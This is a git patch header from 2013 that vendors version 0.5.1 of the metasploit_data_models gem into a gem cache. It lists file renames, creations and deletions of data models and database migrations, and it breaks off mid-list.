From: Luke Imhoff Date: Fri, 1 Mar 2013 14:06:58 -0600 Subject: [PATCH 56/87] Add metasploit_data_models 0.5.1 to gemcache [#44034071] --- .../gems/metasploit_data_models-0.4.0/Gemfile | 10 - .../metasploit_data_models-0.4.0/Rakefile | 7 - .../app/models/mdm/web_vuln.rb | 16 - .../lib/metasploit_data_models/version.rb | 7 - .../.gitignore | 10 +- .../.rspec | 0 .../metasploit_data_models-0.5.1/.simplecov | 38 ++ .../metasploit_data_models-0.5.1/.yardopts | 4 + .../gems/metasploit_data_models-0.5.1/Gemfile | 22 + .../LICENSE | 0 .../README.md | 0 .../metasploit_data_models-0.5.1/Rakefile | 20 + .../app/models/mdm/api_key.rb | 0 .../app/models/mdm/client.rb | 0 .../app/models/mdm/cred.rb | 0 .../app/models/mdm/event.rb | 0 .../app/models/mdm/exploit_attempt.rb | 0 .../app/models/mdm/exploited_host.rb | 0 .../app/models/mdm/host.rb | 0 .../app/models/mdm/host_detail.rb | 0 .../app/models/mdm/host_tag.rb | 0 .../app/models/mdm/imported_cred.rb | 0 .../app/models/mdm/listener.rb | 0 .../app/models/mdm/loot.rb | 0 .../app/models/mdm/macro.rb | 0 .../app/models/mdm/mod_ref.rb | 0 .../app/models/mdm/module_action.rb | 0 .../app/models/mdm/module_arch.rb | 0 .../app/models/mdm/module_author.rb | 0 .../app/models/mdm/module_detail.rb | 0 .../app/models/mdm/module_mixin.rb | 0 .../app/models/mdm/module_platform.rb | 0 .../app/models/mdm/module_ref.rb | 0 .../app/models/mdm/module_target.rb | 0 .../app/models/mdm/nexpose_console.rb | 0 .../app/models/mdm/note.rb | 0 .../app/models/mdm/profile.rb | 0 .../app/models/mdm/ref.rb | 0 .../app/models/mdm/report.rb | 0 .../app/models/mdm/report_template.rb | 0 .../app/models/mdm/route.rb | 0 .../app/models/mdm/service.rb | 0 .../app/models/mdm/session.rb | 0 .../app/models/mdm/session_event.rb | 0 .../app/models/mdm/tag.rb | 0 .../app/models/mdm/task.rb | 0 .../app/models/mdm/user.rb | 0 .../app/models/mdm/vuln.rb | 0 .../app/models/mdm/vuln_attempt.rb | 0 .../app/models/mdm/vuln_detail.rb | 0 .../app/models/mdm/vuln_ref.rb | 0 .../app/models/mdm/web_form.rb | 0 .../app/models/mdm/web_page.rb | 0 .../app/models/mdm/web_site.rb | 0 .../app/models/mdm/web_vuln.rb | 144 ++++ .../app/models/mdm/wmap_request.rb | 0 .../app/models/mdm/wmap_target.rb | 0 .../app/models/mdm/workspace.rb | 0 .../bin/mdm_console | 0 .../console_db.yml | 0 .../db/migrate/000_create_tables.rb | 79 +++ .../db/migrate/001_add_wmap_tables.rb | 35 + .../db/migrate/002_add_workspaces.rb | 36 + .../db/migrate/003_move_notes.rb | 20 + .../db/migrate/004_add_events_table.rb | 16 + .../db/migrate/005_expand_info.rb | 58 ++ .../db/migrate/006_add_timestamps.rb | 26 + .../db/migrate/007_add_loots.rb | 20 + .../db/migrate/008_create_users.rb | 16 + .../db/migrate/009_add_loots_ctype.rb | 10 + .../db/migrate/010_add_alert_fields.rb | 16 + .../db/migrate/011_add_reports.rb | 19 + .../db/migrate/012_add_tasks.rb | 24 + .../db/migrate/013_add_tasks_result.rb | 10 + .../db/migrate/014_add_loots_fields.rb | 12 + .../db/migrate/015_rename_user.rb | 16 + .../db/migrate/016_add_host_purpose.rb | 10 + .../db/migrate/017_expand_info2.rb | 58 ++ .../db/migrate/018_add_workspace_user_info.rb | 29 + .../db/migrate/019_add_workspace_desc.rb | 23 + .../db/migrate/020_add_user_preferences.rb | 11 + .../migrate/021_standardize_info_and_data.rb | 18 + .../db/migrate/022_enlarge_event_info.rb | 10 + .../migrate/023_add_report_downloaded_at.rb | 10 + .../024_convert_service_info_to_text.rb | 12 + .../db/migrate/025_add_user_admin.rb | 19 + .../db/migrate/026_add_creds_table.rb | 19 + .../20100819123300_migrate_cred_data.rb | 154 +++++ .../20100824151500_add_exploited_table.rb | 16 + .../20100908001428_add_owner_to_workspaces.rb | 9 + .../20100911122000_add_report_templates.rb | 18 + .../20100916151530_require_admin_flag.rb | 15 + ...00916175000_add_campaigns_and_templates.rb | 61 ++ .../20100920012100_add_generate_exe_column.rb | 8 + .../20100926214000_add_template_prefs.rb | 11 + .../migrate/20101001000000_add_web_tables.rb | 57 ++ .../db/migrate/20101002000000_add_query.rb | 10 + .../migrate/20101007000000_add_vuln_info.rb | 15 + ...20101008111800_add_clients_to_campaigns.rb | 10 + ...20101009023300_add_campaign_attachments.rb | 15 + .../20101104135100_add_imported_creds.rb | 17 + .../migrate/20101203000000_fix_web_tables.rb | 34 + .../20101203000001_expand_host_comment.rb | 12 + ...2033_add_limit_to_network_to_workspaces.rb | 9 + ...20110112154300_add_module_uuid_to_tasks.rb | 9 + .../migrate/20110204112800_add_host_tags.rb | 28 + .../20110317144932_add_session_table.rb | 110 +++ ...414180600_add_local_id_to_session_table.rb | 11 + .../20110415175705_add_routes_table.rb | 18 + .../migrate/20110422000000_convert_binary.rb | 72 ++ ...0110425095900_add_last_seen_to_sessions.rb | 8 + ...0110513143900_track_successful_exploits.rb | 31 + ...517160800_rename_and_prune_nessus_vulns.rb | 26 + ...0527000000_add_task_id_to_reports_table.rb | 11 + .../20110527000001_add_api_keys_table.rb | 12 + .../20110606000001_add_macros_table.rb | 16 + ...10622000000_add_settings_to_tasks_table.rb | 12 + .../20110624000001_add_listeners_table.rb | 19 + ...0625000001_add_macro_to_listeners_table.rb | 12 + ...110630000001_add_nexpose_consoles_table.rb | 21 + ...0002_add_name_to_nexpose_consoles_table.rb | 12 + .../20110717000001_add_profiles_table.rb | 15 + ...20110727163801_expand_cred_ptype_column.rb | 9 + .../20110730000001_add_initial_indexes.rb | 85 +++ .../migrate/20110812000001_prune_indexes.rb | 23 + .../db/migrate/20110922000000_expand_notes.rb | 9 + .../20110928101300_add_mod_ref_table.rb | 17 + ...10000_add_display_name_to_reports_table.rb | 24 + .../db/migrate/20111203000000_inet_columns.rb | 13 + .../20111204000000_more_inet_columns.rb | 17 + .../20111210000000_add_scope_to_hosts.rb | 9 + ...0120126110000_add_virtual_host_to_hosts.rb | 9 + ...20120411173220_rename_workspace_members.rb | 9 + ...20601152442_add_counter_caches_to_hosts.rb | 21 + .../20120625000000_add_vuln_details.rb | 34 + .../20120625000001_add_host_details.rb | 16 + .../migrate/20120625000002_expand_details.rb | 16 + .../migrate/20120625000003_expand_details2.rb | 24 + .../20120625000004_add_vuln_attempts.rb | 19 + ...000005_add_vuln_and_host_counter_caches.rb | 14 + .../20120625000006_add_module_details.rb | 118 ++++ .../20120625000007_add_exploit_attempts.rb | 26 + .../20120625000008_add_fail_message.rb | 12 + ...2805_add_owner_and_payload_to_web_vulns.rb | 13 + ...ired_columns_to_null_false_in_web_vulns.rb | 35 + .../lib/mdm.rb | 0 .../host/operating_system_normalization.rb | 0 .../lib/metasploit_data_models.rb | 0 .../base64_serializer.rb | 0 .../lib/metasploit_data_models/engine.rb | 0 .../serialized_prefs.rb | 0 .../validators/ip_format_validator.rb | 0 .../password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 8 + .../lib/tasks/yard.rake | 27 + .../metasploit_data_models.gemspec | 4 + .../script/rails | 0 .../spec/app/models/mdm/web_vuln_spec.rb | 87 +++ .../spec/dummy/Rakefile | 0 .../app/assets/javascripts/application.js | 0 .../app/assets/stylesheets/application.css | 0 .../app/controllers/application_controller.rb | 0 .../dummy/app/helpers/application_helper.rb | 0 .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../app/views/layouts/application.html.erb | 0 .../spec/dummy/config.ru | 0 .../spec/dummy/config/application.rb | 0 .../spec/dummy/config/boot.rb | 0 .../spec/dummy/config/database.yml.example | 0 .../spec/dummy/config/environment.rb | 0 .../dummy/config/environments/development.rb | 0 .../dummy/config/environments/production.rb | 0 .../spec/dummy/config/environments/test.rb | 0 .../initializers/backtrace_silencers.rb | 0 .../dummy/config/initializers/inflections.rb | 0 .../dummy/config/initializers/mime_types.rb | 0 .../dummy/config/initializers/secret_token.rb | 0 .../config/initializers/session_store.rb | 0 .../config/initializers/wrap_parameters.rb | 0 .../spec/dummy/config/routes.rb | 0 .../spec/dummy/db/schema.rb | 638 ++++++++++++++++++ .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 0 .../spec/dummy/public/422.html | 0 .../spec/dummy/public/500.html | 0 .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 0 .../spec/lib/base64_serializer_spec.rb | 0 .../spec/spec_helper.rb | 2 + ...c => metasploit_data_models-0.5.1.gemspec} | 16 +- 192 files changed, 3131 insertions(+), 47 deletions(-) delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/.gitignore (78%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/.rspec (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/LICENSE (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/README.md (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/client.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_author.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_site.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/workspace.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/console_db.yml (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/mdm.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/mdm/host/operating_system_normalization.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/base64_serializer.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/engine.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/serialized_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/metasploit_data_models.gemspec (88%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => 